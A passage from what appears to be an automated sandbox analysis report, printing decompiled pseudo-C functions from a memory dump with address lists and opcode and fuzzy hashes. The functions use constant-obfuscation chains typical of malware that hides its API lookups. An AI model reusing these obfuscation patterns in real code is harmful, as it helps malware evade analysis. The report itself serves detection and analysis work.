                                                                                                                                                                                                                    				_v16 = 0xe1ac9d;
                                                                                                                                                                                                                    				_v16 = _v16 + 0xffffbf88;
                                                                                                                                                                                                                    				_v16 = _v16 / _t110;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x6daceb5f;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x6db836a0;
                                                                                                                                                                                                                    				_v36 = 0xe968ec;
                                                                                                                                                                                                                    				_v36 = _v36 | 0x7a3b2f2d;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x7af62268;
                                                                                                                                                                                                                    				_v40 = 0x4b53c3;
                                                                                                                                                                                                                    				_v40 = _v40 | 0xd2a09bdc;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0xd2e617be;
                                                                                                                                                                                                                    				_v20 = 0x5a966;
                                                                                                                                                                                                                    				_v20 = _v20 + 0xc64b;
                                                                                                                                                                                                                    				_v20 = _v20 + 0xffff06bd;
                                                                                                                                                                                                                    				_v20 = _v20 << 3;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x0021161a;
                                                                                                                                                                                                                    				_v32 = 0xb53d6a;
                                                                                                                                                                                                                    				_v32 = _v32 + 0xffff358c;
                                                                                                                                                                                                                    				_v32 = _v32 >> 4;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x00010618;
                                                                                                                                                                                                                    				_push(_v8);
                                                                                                                                                                                                                    				_push(_v24);
                                                                                                                                                                                                                    				_push(_v28);
                                                                                                                                                                                                                    				 *((intOrPtr*)( *0xa83b2c + 0xc + __edx * 4)) = E00A7A50D(_v16, E00A81E60(_t96, _v12, _v32), _v36);
                                                                                                                                                                                                                    				return E00A7D6DF(_v40, _t93, _v20, _v32);
                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                    0x00a6a030
                                                                                                                                                                                                                    0x00a6a042
                                                                                                                                                                                                                    0x00a6a047
                                                                                                                                                                                                                    0x00a6a04c
                                                                                                                                                                                                                    0x00a6a057
                                                                                                                                                                                                                    0x00a6a058
                                                                                                                                                                                                                    0x00a6a05b
                                                                                                                                                                                                                    0x00a6a062
                                                                                                                                                                                                                    0x00a6a069
                                                                                                                                                                                                                    0x00a6a070
                                                                                                                                                                                                                    0x00a6a077
                                                                                                                                                                                                                    0x00a6a07e
                                                                                                                                                                                                                    0x00a6a085
                                                                                                                                                                                                                    0x00a6a089
                                                                                                                                                                                                                    0x00a6a090
                                                                                                                                                                                                                    0x00a6a097
                                                                                                                                                                                                                    0x00a6a09e
                                                                                                                                                                                                                    0x00a6a0a2
                                                                                                                                                                                                                    0x00a6a0a6
                                                                                                                                                                                                                    0x00a6a0ad
                                                                                                                                                                                                                    0x00a6a0b4
                                                                                                                                                                                                                    0x00a6a0bb
                                                                                                                                                                                                                    0x00a6a0c7
                                                                                                                                                                                                                    0x00a6a0ca
                                                                                                                                                                                                                    0x00a6a0d1
                                                                                                                                                                                                                    0x00a6a0d8
                                                                                                                                                                                                                    0x00a6a0df
                                                                                                                                                                                                                    0x00a6a0e6
                                                                                                                                                                                                                    0x00a6a0ed
                                                                                                                                                                                                                    0x00a6a0f4
                                                                                                                                                                                                                    0x00a6a0fb
                                                                                                                                                                                                                    0x00a6a102
                                                                                                                                                                                                                    0x00a6a109
                                                                                                                                                                                                                    0x00a6a110
                                                                                                                                                                                                                    0x00a6a117
                                                                                                                                                                                                                    0x00a6a11b
                                                                                                                                                                                                                    0x00a6a122
                                                                                                                                                                                                                    0x00a6a129
                                                                                                                                                                                                                    0x00a6a130
                                                                                                                                                                                                                    0x00a6a134
                                                                                                                                                                                                                    0x00a6a13b
                                                                                                                                                                                                                    0x00a6a13e
                                                                                                                                                                                                                    0x00a6a141
                                                                                                                                                                                                                    0x00a6a169
                                                                                                                                                                                                                    0x00a6a17d

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: -/;z
                                                                                                                                                                                                                    • API String ID: 0-3429883448
                                                                                                                                                                                                                    • Opcode ID: 385bf6c5961d6ca681ce65164929d365b9ae2926a8c96c6cc1c5b91e9481bddd
                                                                                                                                                                                                                    • Instruction ID: 897220f6a94c2a18670e42bcf928458cfef798f5ef64417f72b45198714a771e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 385bf6c5961d6ca681ce65164929d365b9ae2926a8c96c6cc1c5b91e9481bddd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D41F2B2D0131DABCF59CFA5C94A4DEFBB1EB84314F208198D522B6264D3B94B46CF91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                    			E00A76A6B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				void* _t86;
                                                                                                                                                                                                                    				signed int _t99;
                                                                                                                                                                                                                    				signed int _t100;
                                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                                    				void* _t110;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_t110 = __ecx;
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t86);
                                                                                                                                                                                                                    				_v12 = 0xf84e4e;
                                                                                                                                                                                                                    				_t99 = 0x39;
                                                                                                                                                                                                                    				_v12 = _v12 / _t99;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x6728c124;
                                                                                                                                                                                                                    				_v12 = _v12 << 0xa;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0xb261ed79;
                                                                                                                                                                                                                    				_v8 = 0xe5bf04;
                                                                                                                                                                                                                    				_v8 = _v8 | 0x59e245d9;
                                                                                                                                                                                                                    				_t100 = 0x1d;
                                                                                                                                                                                                                    				_v8 = _v8 / _t100;
                                                                                                                                                                                                                    				_v8 = _v8 + 0xffffce57;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x031a348e;
                                                                                                                                                                                                                    				_v20 = 0xe66652;
                                                                                                                                                                                                                    				_v20 = _v20 + 0xffffb462;
                                                                                                                                                                                                                    				_v20 = _v20 | 0x72dc54bb;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x72fe7a3c;
                                                                                                                                                                                                                    				_v20 = 0x9cc852;
                                                                                                                                                                                                                    				_v20 = _v20 + 0xcdc3;
                                                                                                                                                                                                                    				_v20 = _v20 | 0x728ddc62;
                                                                                                                                                                                                                    				_v20 = _v20 >> 0xe;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x000af4e3;
                                                                                                                                                                                                                    				_v20 = 0x6cbe6c;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x13f83ffe;
                                                                                                                                                                                                                    				_v20 = _v20 << 7;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0xca48a320;
                                                                                                                                                                                                                    				_v20 = 0x7dde74;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x91e45036;
                                                                                                                                                                                                                    				_v20 = _v20 >> 2;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x246c3db4;
                                                                                                                                                                                                                    				_v20 = 0xf513cd;
                                                                                                                                                                                                                    				_v20 = _v20 | 0x99dd0c8f;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x6ed09b70;
                                                                                                                                                                                                                    				_v20 = _v20 + 0xffff87fc;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0xf7293edf;
                                                                                                                                                                                                                    				_v16 = 0x193235;
                                                                                                                                                                                                                    				_v16 = _v16 << 2;
                                                                                                                                                                                                                    				_t101 = 0x7f;
                                                                                                                                                                                                                    				_v16 = _v16 / _t101;
                                                                                                                                                                                                                    				_v16 = _v16 + 0xffff18df;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0xfffdc8db;
                                                                                                                                                                                                                    				return E00A7CCCE(_t101, _v20, _t110, E00A6D266(_t101), _v16);
                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                    0x00a76a72
                                                                                                                                                                                                                    0x00a76a75
                                                                                                                                                                                                                    0x00a76a77
                                                                                                                                                                                                                    0x00a76a7a
                                                                                                                                                                                                                    0x00a76a7d
                                                                                                                                                                                                                    0x00a76a7e
                                                                                                                                                                                                                    0x00a76a7f
                                                                                                                                                                                                                    0x00a76a84
                                                                                                                                                                                                                    0x00a76a92
                                                                                                                                                                                                                    0x00a76a97
                                                                                                                                                                                                                    0x00a76a9c
                                                                                                                                                                                                                    0x00a76aa3
                                                                                                                                                                                                                    0x00a76aa7
                                                                                                                                                                                                                    0x00a76aae
                                                                                                                                                                                                                    0x00a76ab5
                                                                                                                                                                                                                    0x00a76abf
                                                                                                                                                                                                                    0x00a76ac4
                                                                                                                                                                                                                    0x00a76ac9
                                                                                                                                                                                                                    0x00a76ad0
                                                                                                                                                                                                                    0x00a76ad7
                                                                                                                                                                                                                    0x00a76ade
                                                                                                                                                                                                                    0x00a76ae5
                                                                                                                                                                                                                    0x00a76aec
                                                                                                                                                                                                                    0x00a76af3
                                                                                                                                                                                                                    0x00a76afa
                                                                                                                                                                                                                    0x00a76b01
                                                                                                                                                                                                                    0x00a76b08
                                                                                                                                                                                                                    0x00a76b0c
                                                                                                                                                                                                                    0x00a76b13
                                                                                                                                                                                                                    0x00a76b1a
                                                                                                                                                                                                                    0x00a76b21
                                                                                                                                                                                                                    0x00a76b25
                                                                                                                                                                                                                    0x00a76b2c
                                                                                                                                                                                                                    0x00a76b33
                                                                                                                                                                                                                    0x00a76b3a
                                                                                                                                                                                                                    0x00a76b3e
                                                                                                                                                                                                                    0x00a76b45
                                                                                                                                                                                                                    0x00a76b4c
                                                                                                                                                                                                                    0x00a76b53
                                                                                                                                                                                                                    0x00a76b5a
                                                                                                                                                                                                                    0x00a76b61
                                                                                                                                                                                                                    0x00a76b68
                                                                                                                                                                                                                    0x00a76b6f
                                                                                                                                                                                                                    0x00a76b76
                                                                                                                                                                                                                    0x00a76b79
                                                                                                                                                                                                                    0x00a76b7c
                                                                                                                                                                                                                    0x00a76b83
                                                                                                                                                                                                                    0x00a76ba9

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: Rf
                                                                                                                                                                                                                    • API String ID: 0-4002359730
                                                                                                                                                                                                                    • Opcode ID: 11966cf9954599509b14550344d2ceb50daba2845a40991407269dfbf4717c57
                                                                                                                                                                                                                    • Instruction ID: f08259a209c8310871cd272b92aa1ca35c0728a998a4dd94bb3d7d6d728f5dc4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11966cf9954599509b14550344d2ceb50daba2845a40991407269dfbf4717c57
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D31FE75D0032EEBCB58DFA5D94A5EEBBB1FF00704F108A99E426A6260C3B45B45DF84
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                                                                    			E00A6B7B7(void* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                    				void* _t65;
                                                                                                                                                                                                                    				intOrPtr _t74;
                                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                                    				signed int _t77;
                                                                                                                                                                                                                    				intOrPtr* _t87;
                                                                                                                                                                                                                    				intOrPtr* _t88;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t88 = _a8;
                                                                                                                                                                                                                    				_push(_t88);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_t87 = __edx;
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				E00A7C6D8(_t65);
                                                                                                                                                                                                                    				_v28 = _v28 & 0x00000000;
                                                                                                                                                                                                                    				_v40 = 0xa77ad0;
                                                                                                                                                                                                                    				_v36 = 0x29c40f;
                                                                                                                                                                                                                    				_v32 = 0x26905b;
                                                                                                                                                                                                                    				_v12 = 0xedc680;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x64be117f;
                                                                                                                                                                                                                    				_v12 = _v12 | 0xf824e429;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0xfc7ab98d;
                                                                                                                                                                                                                    				_a8 = 0xcb85b0;
                                                                                                                                                                                                                    				_t76 = 0x30;
                                                                                                                                                                                                                    				_a8 = _a8 / _t76;
                                                                                                                                                                                                                    				_a8 = _a8 ^ 0x90d17ca8;
                                                                                                                                                                                                                    				_a8 = _a8 + 0x5f39;
                                                                                                                                                                                                                    				_a8 = _a8 ^ 0x90d5e4d7;
                                                                                                                                                                                                                    				_v24 = 0x1cb56;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x9db8aeb1;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x9dbe6c6a;
                                                                                                                                                                                                                    				_v20 = 0x4a374f;
                                                                                                                                                                                                                    				_t77 = 0x5b;
                                                                                                                                                                                                                    				_v20 = _v20 / _t77;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x00091478;
                                                                                                                                                                                                                    				_v16 = 0x4981c8;
                                                                                                                                                                                                                    				_v16 = _v16 | 0x79c8dac4;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x79c1d90f;
                                                                                                                                                                                                                    				_v8 = 0x50c00c;
                                                                                                                                                                                                                    				_v8 = _v8 + 0xffffd930;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0xdfb0d120;
                                                                                                                                                                                                                    				_v8 = _v8 * 0x4a;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0xb6dfcece;
                                                                                                                                                                                                                    				E00A6DA0C(_v12,  *((intOrPtr*)(__edx + 4)), _t88, _a8);
                                                                                                                                                                                                                    				E00A7056B( *__edx, _v24,  *_t88,  *((intOrPtr*)(__edx + 4)), _v20, _v16, _v8);
                                                                                                                                                                                                                    				_t74 =  *((intOrPtr*)(_t87 + 4));
                                                                                                                                                                                                                    				 *_t88 =  *_t88 + _t74;
                                                                                                                                                                                                                    				return _t74;
                                                                                                                                                                                                                    			}


















                                                                                                                                                                                                                    0x00a6b7be
                                                                                                                                                                                                                    0x00a6b7c2
                                                                                                                                                                                                                    0x00a6b7c3
                                                                                                                                                                                                                    0x00a6b7c6
                                                                                                                                                                                                                    0x00a6b7c8
                                                                                                                                                                                                                    0x00a6b7ca
                                                                                                                                                                                                                    0x00a6b7cf
                                                                                                                                                                                                                    0x00a6b7d5
                                                                                                                                                                                                                    0x00a6b7dc
                                                                                                                                                                                                                    0x00a6b7e3
                                                                                                                                                                                                                    0x00a6b7ea
                                                                                                                                                                                                                    0x00a6b7f1
                                                                                                                                                                                                                    0x00a6b7f8
                                                                                                                                                                                                                    0x00a6b7ff
                                                                                                                                                                                                                    0x00a6b806
                                                                                                                                                                                                                    0x00a6b812
                                                                                                                                                                                                                    0x00a6b817
                                                                                                                                                                                                                    0x00a6b81c
                                                                                                                                                                                                                    0x00a6b823
                                                                                                                                                                                                                    0x00a6b82a
                                                                                                                                                                                                                    0x00a6b831
                                                                                                                                                                                                                    0x00a6b838
                                                                                                                                                                                                                    0x00a6b83f
                                                                                                                                                                                                                    0x00a6b846
                                                                                                                                                                                                                    0x00a6b850
                                                                                                                                                                                                                    0x00a6b853
                                                                                                                                                                                                                    0x00a6b856
                                                                                                                                                                                                                    0x00a6b85d
                                                                                                                                                                                                                    0x00a6b864
                                                                                                                                                                                                                    0x00a6b86b
                                                                                                                                                                                                                    0x00a6b872
                                                                                                                                                                                                                    0x00a6b879
                                                                                                                                                                                                                    0x00a6b880
                                                                                                                                                                                                                    0x00a6b88b
                                                                                                                                                                                                                    0x00a6b88e
                                                                                                                                                                                                                    0x00a6b89f
                                                                                                                                                                                                                    0x00a6b8b7
                                                                                                                                                                                                                    0x00a6b8bc
                                                                                                                                                                                                                    0x00a6b8c2
                                                                                                                                                                                                                    0x00a6b8c9

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: O7J
                                                                                                                                                                                                                    • API String ID: 0-2190023509
                                                                                                                                                                                                                    • Opcode ID: b3b476040278362f154b9939a6f43809839c3d3847298e5fb95faa695e7997ac
                                                                                                                                                                                                                    • Instruction ID: cd4ac30bed16759b6a587e02b014b05dbeffeacf45819bc399d9c019b89090f1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3b476040278362f154b9939a6f43809839c3d3847298e5fb95faa695e7997ac
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 253158B1800209EBDF08CFA1C9468DEBFB1FF54310F20C149E42866260D7B59B61DF90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                                                                                    			E00A7E554(void* __ecx, intOrPtr _a4, signed int _a8) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				unsigned int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _t84;
                                                                                                                                                                                                                    				signed int _t85;
                                                                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                                                                    				signed int _t87;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_v16 = 0x19ecac;
                                                                                                                                                                                                                    				_v16 = _v16 | 0x9edd9290;
                                                                                                                                                                                                                    				_v16 = _v16 >> 0xa;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x002453b3;
                                                                                                                                                                                                                    				_v12 = 0xcdea21;
                                                                                                                                                                                                                    				_v12 = _v12 << 0x10;
                                                                                                                                                                                                                    				_v12 = _v12 | 0x693c4807;
                                                                                                                                                                                                                    				_t84 = 0x44;
                                                                                                                                                                                                                    				_v12 = _v12 / _t84;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x03787234;
                                                                                                                                                                                                                    				_v8 = 0x4df8b1;
                                                                                                                                                                                                                    				_t85 = 0x4b;
                                                                                                                                                                                                                    				_v8 = _v8 / _t85;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0xbfd17572;
                                                                                                                                                                                                                    				_v8 = _v8 + 0xffff1fe7;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0xbfcd5b81;
                                                                                                                                                                                                                    				_v20 = 0x88016a;
                                                                                                                                                                                                                    				_t86 = 0x4e;
                                                                                                                                                                                                                    				_t87 = _a8;
                                                                                                                                                                                                                    				_v20 = _v20 / _t86;
                                                                                                                                                                                                                    				_v20 = _v20 << 8;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x01ba01cf;
                                                                                                                                                                                                                    				_v24 = 0x784168;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x8a83838d;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x8af55906;
                                                                                                                                                                                                                    				if( *((intOrPtr*)(0xa83210 + _t87 * 4)) == 0) {
                                                                                                                                                                                                                    					_push(__ecx);
                                                                                                                                                                                                                    					_push(__ecx);
                                                                                                                                                                                                                    					_push(E00A68FAA(__ecx));
                                                                                                                                                                                                                    					_push(_a4);
                                                                                                                                                                                                                    					 *((intOrPtr*)(0xa83210 + _t87 * 4)) = E00A71948(_v20, _v24);
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				return  *((intOrPtr*)(0xa83210 + _t87 * 4));
                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                    0x00a7e55a
                                                                                                                                                                                                                    0x00a7e563
                                                                                                                                                                                                                    0x00a7e56a
                                                                                                                                                                                                                    0x00a7e56e
                                                                                                                                                                                                                    0x00a7e575
                                                                                                                                                                                                                    0x00a7e57c
                                                                                                                                                                                                                    0x00a7e580
                                                                                                                                                                                                                    0x00a7e58d
                                                                                                                                                                                                                    0x00a7e592
                                                                                                                                                                                                                    0x00a7e597
                                                                                                                                                                                                                    0x00a7e59e
                                                                                                                                                                                                                    0x00a7e5a8
                                                                                                                                                                                                                    0x00a7e5ad
                                                                                                                                                                                                                    0x00a7e5b2
                                                                                                                                                                                                                    0x00a7e5b9
                                                                                                                                                                                                                    0x00a7e5c0
                                                                                                                                                                                                                    0x00a7e5c7
                                                                                                                                                                                                                    0x00a7e5d1
                                                                                                                                                                                                                    0x00a7e5d4
                                                                                                                                                                                                                    0x00a7e5d7
                                                                                                                                                                                                                    0x00a7e5da
                                                                                                                                                                                                                    0x00a7e5de
                                                                                                                                                                                                                    0x00a7e5e5
                                                                                                                                                                                                                    0x00a7e5ec
                                                                                                                                                                                                                    0x00a7e5f3
                                                                                                                                                                                                                    0x00a7e602
                                                                                                                                                                                                                    0x00a7e60d
                                                                                                                                                                                                                    0x00a7e60e
                                                                                                                                                                                                                    0x00a7e61a
                                                                                                                                                                                                                    0x00a7e61b
                                                                                                                                                                                                                    0x00a7e626
                                                                                                                                                                                                                    0x00a7e626
                                                                                                                                                                                                                    0x00a7e638

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: hAx
                                                                                                                                                                                                                    • API String ID: 0-238666944
                                                                                                                                                                                                                    • Opcode ID: bdc1459a614208e8d291306c5a75631eefccc18d3b43f0319be6e31ad237821d
                                                                                                                                                                                                                    • Instruction ID: 8baf5c44263de1a29ba1544ecea1e5866d6000badc995acfad378d0033448ef7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bdc1459a614208e8d291306c5a75631eefccc18d3b43f0319be6e31ad237821d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 012125B2D01218EBDF04EFA5C94A5DEBBB1FB10320F10C488E616A7210C3B4AB45CF90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                    			E00A7CE32() {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _t67;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_v8 = 0xd980ed;
                                                                                                                                                                                                                    				_t67 = 0x23;
                                                                                                                                                                                                                    				_v8 = _v8 * 0x76;
                                                                                                                                                                                                                    				_v8 = _v8 >> 0xa;
                                                                                                                                                                                                                    				_v8 = _v8 + 0xb0a7;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x001f4013;
                                                                                                                                                                                                                    				_v24 = 0xc53faf;
                                                                                                                                                                                                                    				_v24 = _v24 / _t67;
                                                                                                                                                                                                                    				_v24 = _v24 << 4;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x00521e8c;
                                                                                                                                                                                                                    				_v20 = 0xe11d3;
                                                                                                                                                                                                                    				_v20 = _v20 << 9;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x67929d67;
                                                                                                                                                                                                                    				_v20 = _v20 | 0x45f48fdb;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x7ff33b7c;
                                                                                                                                                                                                                    				_v28 = 0xf1ccf4;
                                                                                                                                                                                                                    				_v28 = _v28 | 0x63ff9f99;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x63f858e3;
                                                                                                                                                                                                                    				_v16 = 0x24e100;
                                                                                                                                                                                                                    				_v16 = _v16 * 0x2a;
                                                                                                                                                                                                                    				_v16 = _v16 + 0xffff7511;
                                                                                                                                                                                                                    				_v16 = _v16 + 0xde14;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x06006e43;
                                                                                                                                                                                                                    				_v12 = 0xe43228;
                                                                                                                                                                                                                    				_v12 = _v12 >> 2;
                                                                                                                                                                                                                    				_v12 = _v12 >> 6;
                                                                                                                                                                                                                    				_v12 = _v12 + 0xffff8118;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x0001dcd3;
                                                                                                                                                                                                                    				E00A7D806(_v8,  *((intOrPtr*)( *0xa83208 + 0x50)), _v24);
                                                                                                                                                                                                                    				return E00A76A6B( *((intOrPtr*)( *0xa83208 + 0x5c)), _v20, _v28, _v16, _v12);
                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                    0x00a7ce38
                                                                                                                                                                                                                    0x00a7ce47
                                                                                                                                                                                                                    0x00a7ce48
                                                                                                                                                                                                                    0x00a7ce4b
                                                                                                                                                                                                                    0x00a7ce4f
                                                                                                                                                                                                                    0x00a7ce56
                                                                                                                                                                                                                    0x00a7ce5d
                                                                                                                                                                                                                    0x00a7ce69
                                                                                                                                                                                                                    0x00a7ce6c
                                                                                                                                                                                                                    0x00a7ce70
                                                                                                                                                                                                                    0x00a7ce77
                                                                                                                                                                                                                    0x00a7ce7e
                                                                                                                                                                                                                    0x00a7ce82
                                                                                                                                                                                                                    0x00a7ce89
                                                                                                                                                                                                                    0x00a7ce90
                                                                                                                                                                                                                    0x00a7ce97
                                                                                                                                                                                                                    0x00a7ce9e
                                                                                                                                                                                                                    0x00a7cea5
                                                                                                                                                                                                                    0x00a7ceac
                                                                                                                                                                                                                    0x00a7ceb7
                                                                                                                                                                                                                    0x00a7ceba
                                                                                                                                                                                                                    0x00a7cec1
                                                                                                                                                                                                                    0x00a7cec8
                                                                                                                                                                                                                    0x00a7cecf
                                                                                                                                                                                                                    0x00a7ced6
                                                                                                                                                                                                                    0x00a7ceda
                                                                                                                                                                                                                    0x00a7cede
                                                                                                                                                                                                                    0x00a7cee5
                                                                                                                                                                                                                    0x00a7cefb
                                                                                                                                                                                                                    0x00a7cf20

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: (2
                                                                                                                                                                                                                    • API String ID: 0-427968809
                                                                                                                                                                                                                    • Opcode ID: 1461c6e2efa5ab256653b911892ac01e7d013cf31e24b96fe8d2429d32ec5e61
                                                                                                                                                                                                                    • Instruction ID: 837216e83916414724ca584a29319dce20837ee441d03444641c2378aa5a0cc2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1461c6e2efa5ab256653b911892ac01e7d013cf31e24b96fe8d2429d32ec5e61
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4221DB75D0030AEBCB48DFA0EA4A4AEBBB1BB44304F208588D52177264DBB45B99DF91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                    			E00A7C6D9(intOrPtr _a4) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _t60;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_v20 = 0x90ffc4;
                                                                                                                                                                                                                    				_v20 = _v20 << 0x10;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0xd79f3cf1;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x285b3cf9;
                                                                                                                                                                                                                    				_v16 = 0xb8693d;
                                                                                                                                                                                                                    				_v16 = _v16 << 1;
                                                                                                                                                                                                                    				_v16 = _v16 + 0xffffd49a;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x017b3c3b;
                                                                                                                                                                                                                    				_v12 = 0x5f49e2;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x3d79d67f;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0xee86b68c;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0xd3a7636c;
